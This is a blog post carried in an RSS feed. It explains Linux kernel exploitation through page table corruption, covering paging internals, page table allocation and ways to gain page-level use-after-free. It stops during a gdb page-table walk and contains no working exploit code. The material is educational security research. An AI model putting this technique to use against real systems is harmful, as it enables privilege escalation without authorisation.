<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[sam4k]]></title><description><![CDATA[blogging about pwning kernels and os internals]]></description><link>https://sam4k.com/</link><image><url>https://sam4k.com/favicon.png</url><title>sam4k</title><link>https://sam4k.com/</link></image><generator>Ghost 4.48</generator><lastBuildDate>Thu, 16 Apr 2026 12:50:59 GMT</lastBuildDate><atom:link href="https://sam4k.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Kernel Exploitation Techniques: Turning The (Page) Tables]]></title><description><![CDATA[This post explores attacking page tables as a Linux kernel exploitation technique for gaining powerful read/write primitives.]]></description><link>https://sam4k.com/page-table-kernel-exploitation/</link><guid isPermaLink="false">67fbb9eb752e23048bb85792</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Wed, 07 May 2025 14:01:41 GMT</pubDate><media:content url="https://sam4k.com/content/images/2025/07/tired_computer.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2025/07/tired_computer.gif" alt="Kernel Exploitation Techniques: Turning The (Page) Tables"><p>Two posts in the space of two weeks?! What on earth has gotten into me. Well, I figured I ought to get into the OffensiveCon spirit and get another post on exploitation out there.</p><p>So today we&apos;ll be looking at (user) page table exploitation. If you&apos;ve been keeping up with some of the great kernel exploitation research put out there lately (of which I will be sharing plenty of in this article, don&apos;t worry!), you might have noticed a trend in techniques targeting page tables in order to gain powerful read/write primitives.</p><p>The goal for this post is to provide some insight into why targeting page tables can be such a powerful exploitation technique. We&apos;ll do a primer on how paging works in Linux, to give us some context, before looking at how we can gain control of page tables in the first place, how to exploit them for privilege escalation and mitigations to be aware of.</p><p>As I mentioned, there&apos;s a plethora of great research out there, so where relevant I&apos;ll be linking to them so you can take a deeper dive into specific topics or approaches. At the end of the post I&apos;ll include a section grouping all the relevant public research together.</p><p>So without further ado, let&apos;s get stuck in!</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#paging-primer">Paging Primer</a></li>
<li><a href="#exploitation">Exploitation</a>
<ul>
<li><a href="#user-page-table-allocation">User Page Table Allocation</a></li>
<li><a href="#page-table-corruption">Page Table Corruption?</a>
<ul>
<li><a href="#page-level-primitives">Page-Level Primitives</a></li>
<li><a href="#what-about-other-primitives">What About Other Primitives?</a></li>
</ul>
</li>
<li><a href="#exploiting-a-page-uaf">Exploiting A Page UAF?</a>
<ul>
<li><a href="#pt-entries">PT Entries</a></li>
<li><a href="#huge-pages">Huge Pages</a></li>
<li><a href="#going-for-a-walk">Going For A Walk</a></li>
<li><a href="#approaches">Approaches</a></li>
<li><a href="#on-caching">On Caching</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#physical-kaslr">Physical KASLR</a></li>
<li><a href="#read-only-memory">Read-Only Memory</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a></li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="paging-primer">Paging Primer</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/what_am_i_looking_at.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="480"><figcaption>he&apos;s looking at pages, get it?</figcaption></figure><p>Before we get into the nitty gritty of page tables in kernel exploitation, we should probably quickly cover what pages tables are so we understand why exploiting them is so powerful.</p><p>Let&apos;s pick up where we left off with my <a href="https://sam4k.com/linternals/#virtual-memory">three-part series on virtual memory</a>; if you&apos;re not familiar with concepts like physical vs virtual memory or the user virtual address space, feel free to check out those posts for a recap before heading into this section. </p><p>Okay, so, we have this general idea of the virtual memory model. Let&apos;s take the simple example of running a program, which we&apos;ve <a href="https://sam4k.com/linternals-exploring-the-mm-subsystem-part-1/#what-is-memory-management">touched on previously</a>:</p><ul><li>First, the program itself is stored on disk and must be read</li><li>It is loaded into RAM, where the physical address in memory is mapped into our process&apos; virtual address space</li><li>This &quot;mapping&quot; means that when our program accesses a mapped virtual address, it will be translated into the appropriate physical address so the memory can be accessed</li></ul><p>Page tables are what facilitate the translation of virtual to physical addresses. Why &quot;page&quot; tables? <a href="https://sam4k.com/linternals-memory-allocators-part-1/#page-primer">Recall</a> that virtual memory is divided into &quot;pages&quot; which are <a href="https://elixir.bootlin.com/linux/v5.18.3/source/include/asm-generic/page.h#L18"><code>PAGE_SIZE</code></a> (typically 4096) bytes of contiguous virtual memory; in this case it defines the granularity at which chunks of physical memory are mapped into the virtual address space.</p><p>Each process has its own page tables, as does the kernel, to track what parts of its virtual address space are mapped to what parts of physical memory. So how does this work?</p><p>Page tables are organised into a hierarchy, or levels, with each table containing pointers to the next level. At the lowest level, the table contains pointers to a page of physical memory. Linux currently supports up to 5 levels<sup><a href="https://docs.kernel.org/mm/page_tables.html">[1]</a></sup>: </p><ul><li>Page Global Directory (PGD): Each entry in this table points to a P4D</li><li>Page Level 4 Directory (P4D): Each entry in this table points to a PUD</li><li>Page Upper Directory (PUD): Each entry in this table points to a PMD</li><li>Page Middle Directory (PMD): Each entry in this table points a PT</li><li>Page Table (PT): Each entry (PTE) points to a page of physical memory</li></ul><p>Note that a lot of systems may still use 4 level page tables. In the event a page table level isn&apos;t used (i.e. P4D is only used for 5 level page tables), it is &quot;folded&quot; AKA skipped.</p><p>Okay, that sounds fairly straight forward right? And to add to the page-ception, each of these tables is a <code>PAGE_SIZE</code> bytes. But how does these facilitate address translation?</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/image-1.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="850" height="346" srcset="https://sam4k.com/content/images/size/w600/2025/05/image-1.png 600w, https://sam4k.com/content/images/2025/05/image-1.png 850w" sizes="(min-width: 720px) 720px"><figcaption>Overview of page table structure (Linux x86_64) by <a href="https://www.researchgate.net/scientific-contributions/Hiroki-Kuzuno-2166786557">Hiroki Kuzuno</a>, <a href="https://www.researchgate.net/profile/Toshihiro-Yamauchi-2">Toshihiro Yamauchi</a> <sup><a href="https://www.researchgate.net/figure/Overview-of-page-table-structure-Linux-x86-64-architecture-in-22_fig1_353593783">[1]</a></sup></figcaption></figure><p>That&apos;s where this helpful diagram comes in! Let&apos;s unpack it. In the centre we can see a 4-level page table hierarchy, with the PGD on the left and the final page on the right.</p><p>Looking up, we have see the bits that make up a 64-bit x86_64 virtual address. We can see that the offsets into each table level, and the final page, are actually stored in the virtual address! Isn&apos;t that neat?! </p><p>There&apos;s a few extra details to note here. First, keen readers might notice that we&apos;re actually only using the lower 47 bits of the virtual address! What&apos;s that <code>Sign extended</code> portion? As addresses are canonically 64-bits (i.e. that&apos;s how they&apos;re treated and handled), the remaining bits 48-63 are sign extended (i.e. copy) bit 47. </p><p>This bit is important, as it denotes if an address is a low address (for userspace) or a high address (for the kernel virtual address space). Don&apos;t believe me? Compare a kernel and userspace address on your x86_64 machine and you&apos;ll always see those bits set/unset.</p><p>Some more useful bits (figuratively speaking) worth mentioning are that:</p><ul><li>Page table entries aren&apos;t just pointers to the next level/memory, they can also contain important metadata like permissions (spoiler alert). </li><li>It&apos;s not just PTEs that can point to physical memory. There&apos;s a concept of huge pages, whereby a PMD points to a huge page of physical memory (a bit out of scope for this).</li><li>The kernel&apos;s page tables are setup at boot time. A process&apos; page tables are setup when it&apos;s created. It used to be the case that the kernel&apos;s page tables were copied into each process&apos; tables (remember, they span a mutually exclusive virtual address range).</li><li>However, since Meltdown (2018) and speculative execution side-channely shenanigans, Kernel Page Table Isolation (KPTI, <code><a href="https://cateee.net/lkddb/web-lkddb/PAGE_TABLE_ISOLATION.html">CONFIG_PAGE_TABLE_ISOLATION</a></code> / <code><a href="https://cateee.net/lkddb/web-lkddb/MITIGATION_PAGE_TABLE_ISOLATION.html">CONFIG_MITIGATION_PAGE_TABLE_ISOLATION</a></code>) was introduced. This removes the kernel mappings from userspace, switching to a separate page table will all the mappings when entering &quot;kernel mode&quot; (i.e. during a syscall, interrupt). </li></ul><p>I&apos;ll touch on all of this in much more detail in the next instalment of my memory <a href="https://sam4k.com/linternals/#memory-management">management linternals series</a>, but there&apos;s also plenty of great resources out there<sup><a href="https://docs.kernel.org/mm/page_tables.html">[1]</a><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">[2]</a></sup>.</p><hr><ol><li><a href="https://docs.kernel.org/mm/page_tables.html">https://docs.kernel.org/mm/page_tables.html</a></li><li><a href="https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md">https://github.com/lorenzo-stoakes/linux-vm-notes/blob/master/sections/page-tables.md</a></li></ol><h2 id="exploitation">Exploitation</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/the_good_part.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="270"></figure><p>Alright, now we&apos;re getting to the fun part! Given what we know about paging in the Linux kernel, we can start to understand why page tables present such a powerful exploitation target. </p><p>Gaining control over even a single PTE (or PMD entry, as this could be a huge page) means not just having control over the access permissions for that virtual memory mapping but also the physical address it maps to. </p><p>When we think of Kernel Address Space Layout Randomisation (KASLR), we&apos;re typically thinking about the virtual address of the kernel. Physical KASLR is slightly different and may not always be present (in the case of upstream <code>aarch64</code>) or weaker.</p><p>Therefore, control over a PTE belonging to our process essentially grants us an arbitrary physical address read and write, granting control over the kernel while also bypassing mitigations that hinder other techniques.</p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/image-2.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="613" height="359" srcset="https://sam4k.com/content/images/size/w600/2025/05/image-2.png 600w, https://sam4k.com/content/images/2025/05/image-2.png 613w"></figure><p>But of course, this is all easier said than done! First we have to control a PTE...</p><p>So we have a target in mind for corruption: page tables. In order to realise that goal, we need to consider:</p><ul><li>How page tables are allocated by the kernel, so we know what kind of corruption primitive we need to corrupt them</li><li>Are there generic approaches to gain a page table corruption primitive?</li><li>How do we want to leverage our page table corruption for local privilege escalation?</li></ul><h3 id="user-page-table-allocation">User Page Table Allocation</h3><p>If we want to consider memory corruption, we need to understand how page tables are allocated. As the kernel&apos;s page tables are setup during boot-time, this section will just focus on how user page tables (i.e. for a userspace process) are allocated.</p><p>I&apos;ll save the deep dive for linternals and cut to the chase. User page tables are by default allocated on demand: whenever a virtual address is accessed (read or written) and has a valid physical memory mapping, any missing page tables will be allocated and populated. </p><p>We can use some maths to guarantee this. Recall that each page table is <code>PAGE_SIZE</code> bytes. On a 64-bit system, entries are 64-bits. That means each page table has <code>4096 / 8 = 512</code> entries. We can then work out the virtual address range of each page table level:</p><ul><li>PTE-level table: Each of the 512 entries points to <code>PAGE_SIZE</code> bytes of physical memory. Therefore it spans <code>512 x 4096 = 2097152 = 0x200000 = 2MB</code>. </li><li>Page Middle Directory (PMD): Each entry spans 2MB. An entry may point to a PT or a 2MB block of memory (a huge page). The PMD itself spans <code>0x40000000 = 1GB</code></li><li>This continues with the PUD spanning 512GB, the PGD spanning 256TB. </li></ul><p>We can infer from this that the virtual address of the first entry of a PTE-level table is aligned to <code>0x200000</code>. If we <code>mmap()</code> a page of anonymous memory to a fixed address, aligned to this value we can determine a few things:</p><ul><li>This virtual address&apos; mapping will be the first entry in its PTE-level table</li><li>If there haven&apos;t been any other mappings in this page table (i.e. for the next <code>0x200000 - 0x1000</code> bytes), then this page table hasn&apos;t been allocated yet. Thus, accessing (read/writing) this mapping will cause it to be allocated.</li></ul><p>Another quirk to note is that <code>mmap()</code> can be passed the <code>MAP_POPULATE</code> flag to populate the necessary page tables at the time the mapping is created.</p><p>With that mildly relevant tangent out of the way, let&apos;s look at some code. Due to the tight integration with the hardware, some of the page table handling code is architecture specific. For <code>x86_64</code> our trail starts here:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">gfp_t __userpte_alloc_gfp = GFP_PGTABLE_USER | PGTABLE_HIGHMEM;

pgtable_t pte_alloc_one(struct mm_struct *mm)
{
	return __pte_alloc_one(mm, __userpte_alloc_gfp);
}
</code></pre><figcaption>arch/x86/mm/pgtable.c</figcaption></figure><p>Note the GFP flags used: <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM</code>. A few calls deeper we then get to the <code>asm-generic</code> implementation, <code>pagetable_alloc_noprof()</code>:</p><figure class="kg-card kg-code-card"><pre><code>/**
 * pagetable_alloc - Allocate pagetables
 * @gfp:    GFP flags
 * @order:  desired pagetable order
 *
 * pagetable_alloc allocates memory for page tables as well as a page table
 * descriptor to describe that memory.
 *
 * Return: The ptdesc describing the allocated page tables.
 */
static inline struct ptdesc *pagetable_alloc_noprof(gfp_t gfp, unsigned int order)
{
	struct page *page = alloc_pages_noprof(gfp | __GFP_COMP, order);

	return page_ptdesc(page);
}
</code></pre><figcaption>include/asm-generic/pgalloc.h (used for PTs, PMDs and PUDs)</figcaption></figure><p>As we can see user page tables are allocated using the page allocator, with GFP flags <code>GFP_PGTABLE_USER | PGTABLE_HIGHMEM | __GFP_COMP</code>. Okay, one step closer!</p><p>Now we know we&apos;re dealing with the page allocator. This means that if we want to use a memory corruption primitive to control a page table, we need to have some control over a similarly allocated page from the same allocator. Let&apos;s explore this a bit:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/phys_mem_mgmt.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="959" height="544" srcset="https://sam4k.com/content/images/size/w600/2025/05/phys_mem_mgmt.png 600w, https://sam4k.com/content/images/2025/05/phys_mem_mgmt.png 959w" sizes="(min-width: 720px) 720px"><figcaption><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF slides</a> by PAN ZHENPENG &amp; JHENG BING JHONG</figcaption></figure><p>Above is a diagram showing some page allocator internals. <a href="https://sam4k.com/linternals-memory-allocators-part-1/#0x02-the-buddy-page-allocator">Recall</a> that the page allocator manages chunks of physically contiguous memory by <code>order</code>, where the size of the chunk is <code>2<sup>order</sup> * PAGE_SIZE</code>. </p><p>Free memory chunks are managed by the <code>free_area</code> list, whose index is the <code>order</code> of the free chunks of memory it manages. Each <code>order</code> then has a <code>free_list</code> for each of the <code>MIGRATE_TYPES</code>, which points to the actual memory chunks. Working our way back you&apos;ll then notice each zone has it&apos;s own <code>free_area</code> list... Not to mention each CPU maintains its own per-CPU page cache... So yeah, that&apos;s a lot.</p><p>This means when we&apos;re doing any kind of page allocator-level corruption we need to be aware of all the variables: the CPU cache, zone, migrate type etc. </p><p>In our situation: Our page table is <code>PAGE_SIZE</code> bytes, so a single order 0 page. The GFP flags determine the zone and migrate type. Let&apos;s quickly walk through those:</p><ul><li><code>GFP_PGTABLE_USER</code> after peeling back the macros is <code>__GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_ZERO | __GFP_ACCOUNT</code>. No <code>__GFP_RECLAIMABLE|__GFP_MOVABLE</code> means no <code>MIGRATE_MOVABLE</code><sup><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/gfp.h#L16">[3]</a></sup>.</li><li><code>PGTABLE_HIGHMEM</code> is effectively 0 unless <code>CONFIG_HIGHMEM</code> is set.</li><li><code>__GFP_COMP</code> is for compound pages<sup><a href="https://lwn.net/Articles/619514/">[4]</a></sup>, but doesn&apos;t effect our zone/migrate type.</li></ul><p>So to sum it all up: page tables are order-0 pages allocated by the page allocator, from <code>ZONE_NORMAL</code>, <code>MIGRATE_UNMOVABLE</code>. </p><h3 id="page-table-corruption">Page Table Corruption?</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/tell_me_more.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="635" height="340"></figure><p>Okay, we know what page tables are, why they&apos;re powerful targets for exploitation and now we also know how user page tables are allocated - so how do we get control of one?!</p><p>The vulnerability research gods are fickle ones and we&apos;re often at the whims of the primitives we&apos;re given. So let&apos;s explore a few cases and how we might leverage them to get control of a page table.</p><h4 id="page-level-primitives">Page-Level Primitives</h4><p>By far the &quot;easiest&quot; way would be if we had a nice <strong>order-0 page use-after-free (UAF)</strong>, with suitable zone and migrate types. In this scenario, we could do some classic memory fengshui to have our page reallocated as a page table. </p><p>Even if it wasn&apos;t an order-0 page, due to the <a href="https://sam4k.com/linternals-memory-allocators-part-1/#buddy-system-algorithm">buddy algorithm</a>, if we exhaust the order-0 pages the allocator will split order-1 pages, if they&apos;re exhausted then order-2 and so on. A similar technique could be used to exploit a page allocator level out-of-bounds write (OOBW), by having our OOBW source page allocated adjacent to our page table. </p><p>I thought I&apos;d share some cool public research demonstrating this, funnily enough page-level UAFs aren&apos;t too common, so both examples are from GPU bugs:</p><ul><li><a href="https://powerofcommunity.net/poc2024/Pan%20Zhenpeng%20&amp;%20Jheng%20Bing%20Jhong,%20GPUAF%20-%20Two%20ways%20of%20rooting%20All%20Qualcomm%20based%20Android%20phones.pdf">GPUAF - Two ways of Rooting All Qualcomm based Android phones</a> (aarch64)</li><li><a href="https://i.blackhat.com/BH-US-24/Presentations/REVISED02-US24-Gong-The-Way-to-Android-Root-Wednesday.pdf">The Way to Android Root: Exploiting Your GPU On Smartphone</a> (aarch64)</li></ul><h4 id="what-about-other-primitives">What About Other Primitives?</h4><p>But what if we don&apos;t have a nice page-level UAF? What if we&apos;ve got a run of the mill SLAB allocator-level UAF? Is there any hope for us?! Yes!</p><p>As an avid reader of my linternals series, I&apos;m sure you&apos;ll remember that the slabs used by the SLAB allocator are in fact themselves allocated by the page allocator! </p><p>Therefore, if our UAF object is within a slab, perhaps we can cause this slab to get freed, returned to the page allocator and reallocated as a user page table?! We&apos;d need to be mindful of the slabs <code>order</code> (aka size) and what write primitives we can get with our UAF in order to corrupt the page table&apos;s contents, but it&apos;s certainly do able.</p><p>How do I know? Because this is the crux of the <a href="https://web.archive.org/web/20250304082609/https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html">Dirty Pagetable technique</a> published by <a href="https://x.com/NVamous">@NVamous</a> back in 2023. This writeup details pivoting several vulnerabilities into page UAFs in order to gain control over user page tables, so check it out for more details!</p><p>In a similar vein, PageJack was published in 2024 (<a href="https://phrack.org/issues/71/13#article">Phrack article</a>, <a href="https://i.blackhat.com/BH-US-24/Presentations/US24-Qian-PageJack-A-Powerful-Exploit-Technique-With-Page-Level-UAF-Thursday.pdf">BlackHat slides</a>) by Jinmeng Zhou, Jiayi Hu, Wenbo Shen &amp; Zhiyun Qian. This technique also aims to provide a generic approach to gain a page UAF, by pivoting our initial primitive to induce the free of specific &quot;bridge objects&quot; which when freed cause a page UAF.</p><p>Below are some more writeups demonstrating these techniques:</p><ul><li><a href="https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606">&quot;Understanding Dirty Pagetable - m0leCon Finals 2023 CTF Writeup&quot;</a> by <a href="https://x.com/ptryudai">@ptrYudai</a> (x86_64) (2023)</li><li><a href="https://pwning.tech/nftables/">&quot;Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques&quot;</a> by <a href="https://x.com/notselwyn/">@notselwyn</a> expands on the Dirty Pagetable technique (x86_64) (2024)</li></ul><h3 id="exploiting-a-page-uaf">Exploiting A Page UAF?</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2025/05/hacking.gif" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="480" height="270"></figure><p>The pieces are finally aligned: we know what page tables are, why they&apos;re a big deal and now we even know how to get control of them ... but what do we do with all this power?!</p><p>As I mentioned earlier, we&apos;re often at the whims at whatever bug the VR gods have tossed our way, so each bug is going to have its own quirks. Maybe you have an 8 byte arbitrary write or maybe you only have control over a single bit. While I can&apos;t cover all eventualities, hopefully this section provides enough information to figure it out.</p><p>So we have a, either directly or through some technique, gained a page UAF, had that page reallocated as a user page table (for our process) and as a result have the means to corrupt all or some portion of the page table - what&apos;s next? </p><h4 id="pt-entries">PT Entries</h4><p>First things first, we want to understand what we&apos;re corrupting - what does our page table <em>actually</em> contain? Sure, it maps a specific page of virtual memory to a physical address, but what does this involve? </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/x86_64_pte-1.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="430" height="288"><figcaption>x86_64 PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></figcaption></figure><p>Above is a diagram of what an 8 byte PT entry looks like on x86_64. Here <code>M</code> is the maximum physical address bit, i.e. how many bits are used for addressing. As we touched one earlier, this isn&apos;t actually 64, but a small value such as 47.</p><p>So this is a pretty smart use of space. As we know, these entries map pages in memory (i.e. <code>PAGE_SIZE</code> bytes of memory), so all addresses are page aligned. With a page size of <code>0x1000</code>, this means the lower 0-11 bits are always going to be zero, so they can be used for metadata! Similarly, anything above the maximum address bit can be used for metadata.</p><p>Remember, this user page table corresponds to a portion (a 2MB portion specifically) of our processes&apos; virtual address space. So we&apos;re interested in: </p><ul><li>The address bits, which control the physical page in memory that the virtual address corresponding to this entry will map to when accessed by our process.</li><li>The permission bits, particularly if we map a read-only file (such as an SUID binary or system library) into the virtual address range covered by this page table. </li></ul><h4 id="huge-pages">Huge Pages</h4><p>As we&apos;ve touched on, PMDs and PUDs are allocated the same way as PTs - via the page allocator. So it is also feasible we could target one of these for our page-UAF. </p><p>Albeit, in their default usecase, this would be less practical than corrupting a PT. A PT would let us direct a virtual address to an arbitrary physical address, but PMD and PUD entries point to other tables ... Apart from huge pages! </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://sam4k.com/content/images/2025/05/x86_64_pmd_pud.png" class="kg-image" alt="Kernel Exploitation Techniques: Turning The (Page) Tables" loading="lazy" width="430" height="626"><figcaption>x86_64 PUD, PMD and PT Entry from <a href="https://wiki.osdev.org/Paging">OSDev.wiki</a></figcaption></figure><p>The above diagram shows the formatting for x86_64 PUD, PMD and PT entries. Both the PUD and PMD entries include a Page Size (<code>PS</code>) attribute. If this bit is set, it is treated as mapping to a huge page of physical memory, who size is appropriate for the page-level.</p><p>As we covered earlier, for a PMD this is 2MB and for a PUD it&apos;s 1GB. As the physical addresses are aligned to the value of the physical mapping, we can see the PMD entry has even less address bits than the PT entry and the PUD even less than the PMD. </p><h4 id="going-for-a-walk">Going For A Walk</h4><p>So far this has been all quite abstract, so, if you&apos;ll indulge me, let&apos;s go for a quick (page table) walk. We&apos;ll take all the paging internals we&apos;ve picked up so far to do some debugging in order to get some hands on and confirm what we&apos;ve learned.</p><p>For our little walk, I&apos;m going to use the following program to setup an interesting virtual address space to explore via kernel debugging:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;unistd.h&gt;

#define PAGE_SIZE (0x1000UL)
#define PT_SIZE (512 * PAGE_SIZE) // 0x200000
#define PMD_SIZE (512 * PT_SIZE)  // 0x40000000
#define PUD_SIZE (512 * PMD_SIZE) // 0x8000000000
#define PGD_SIZE (512 * PUD_SIZE) // 0x1000000000000

int main()
{
    int fd = open(&quot;test.txt&quot;, O_RDONLY);

    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, -1, 0);
    mmap((void*)PUD_SIZE + PMD_SIZE + PT_SIZE + PAGE_SIZE + PAGE_SIZE, 0x1000, PROT_READ, MAP_PRIVATE | MAP_FIXED | MAP_POPULATE, fd, 0);

    getchar(); // pause program so i can set a bp to trigger on the next mmap()
    mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    return 0;
}</code></pre><figcaption>Note: MAP_POPULATE is used to make sure the tables are populated on mmap()ing them</figcaption></figure><p>The aim of this little program is to create three mappings, with slightly different permissions and attributes, at a fixed location. Why a fixed location?</p><p>Because as we&apos;ve learned, the virtual address space is directly reflected by it&apos;s page tables. So by using a fixed address we can calculate exactly which PT our page entries will be.</p><p>To make this a little easier, I created some macros to define the size each page table level spans. So, as the virtual address space is reflected directly by the page tables, we know that virtual address <code>0x0</code> is going to be mapped by <code>PGD[0][0][0][0]</code> - where the first index is the PGD entry, then that PUD entry, that PMD entry and finally that PT entry.</p><p>So if we map at fixed address <code>PUD_SIZE + PMD_SIZE + PT_SIZE</code> we&apos;re offsetting it by example one PUD, one PMD and one PT. So we should find it at <code>PGD[1][1][1][0]</code>.</p><p>We can also do it the technical way and explore the bits of the address. <code>PUD_SIZE + PMD_SIZE + PT_SIZE == 0x8040200000</code>. Let&apos;s check out the bits:</p><pre><code>Bit:  63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32
Val:   0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0

Bit:  31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10  9  8  7  6  5  4  3  2  1  0
Val:   0  1  0  0  0  0  0  0  0  0  1  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0  0</code></pre><p>In the paging primer earlier we showed that the entry offsets for the PGD, PUD, PMD, PT were stored in bits <code>39-47</code>, <code>30-38</code>, <code>21-29</code> and <code>12-20</code> respectively. &#xA0;Here we can see those values correspond to <code>1</code>, <code>1</code>, <code>1</code> and <code>0</code>. The same as our previous guess! </p><p>Note that the next two mappings are each offset by <code>PAGE_SIZE</code>, i.e. one PT entry, so they should form 3 contiguous PT entries.</p><p>This is all still theoretical though so let&apos;s put out money where our mouth is. I set up a kernel debugging environment <a href="https://github.com/sam4k/linux-kernel-resources/tree/main/debugging">using gdb and x86_64 QEMU</a>. The plan is to:</p><ul><li>Run this program on the guest</li><li>When it pauses at <code>getchar()</code>, set a breakpoint in gdb at <code>vm_area_alloc(mm)</code></li><li>Continue the program, hit the breakpoint. We now, lazily, have a reference to our processes <code>mm_struct</code> which contains a pointer to its PGD. We can now walk our PGD and find out entries!</li></ul><p>And, just like that we can dump our processes PGD:</p><pre><code>(gdb) x/10gx mm-&gt;pgd
0xffff888106b50000:     0x8000000100172067      0x8000000102c9b067
0xffff888106b50010:     0x0000000000000000      0x0000000000000000
0xffff888106b50020:     0x0000000000000000      0x0000000000000000
</code></pre><p>Great, so far so good. We can see <code>PGD[1]</code> is populated with <code>0x8000000102c9b067</code>. To find the address of the PUD this entry points to, we need to clear the metadata. This, for us, is bits 0:11 and 48:63. We can remove this with a simple mask: <code>0x8000000102c9b067 &amp; 0x0000FFFFFFFFF000 = &#xA0;0x102C9B000</code>.</p><p>Awesome, so now we can move onto our PUD...</p><pre><code>(gdb) x/10gx 0x102C9B000
0x102c9b000:    Cannot access memory at address 0x102c9b000
</code></pre><p>Ah wait, that&apos;s a physical address right, and gdb is dealing with virtual addresses. Not to worry! Fortunately, the <a href="https://sam4k.com/linternals-virtual-memory-part-3/">kernel virtual address space</a> includes a direct mapping of all physical memory (physmap). For x86_64 this at <a href="https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_64_types.h#L45">__PAGE_OFFSET</a>, <code>0xffff888000000000</code>. </p><p>Sooo if that&apos;s the kernel virtual address mapped to the start of physical memory, we just need to offset that by our physical address and we should see our PMD...</p><pre><code>(gdb) x/2gx (0xffff888000000000 + 0x102c9b000)
0xffff888102c9b000:     0x0000000000000000      0x000000010436d067</code></pre><p>Voila! And again, as expected, we have our entry at <code>PGD[1][1]</code>. Let&apos;s keep going:</p><pre><code>(gdb) x/2gx (0xffff888000000000 + (0x000000010436d067 &amp; 0x0000FFFFFFFFF000))
0xffff88810436d000:     0x0000000000000000      0x0000000101346067
</code></pre><p>Now we&apos;re into the PMD and as expected, we see <code>PGD[1][1][1]</code> populated. The next step is the PT, where we should see three entries with slightly different permissions:</p><pre><code>(gdb) x/4gx (0xffff888000000000 + (0x0000000101346067 &amp; 0x0000FFFFFFFFF000))
0xffff888101346000:     0x8000000107422067      0x80000000034ff225
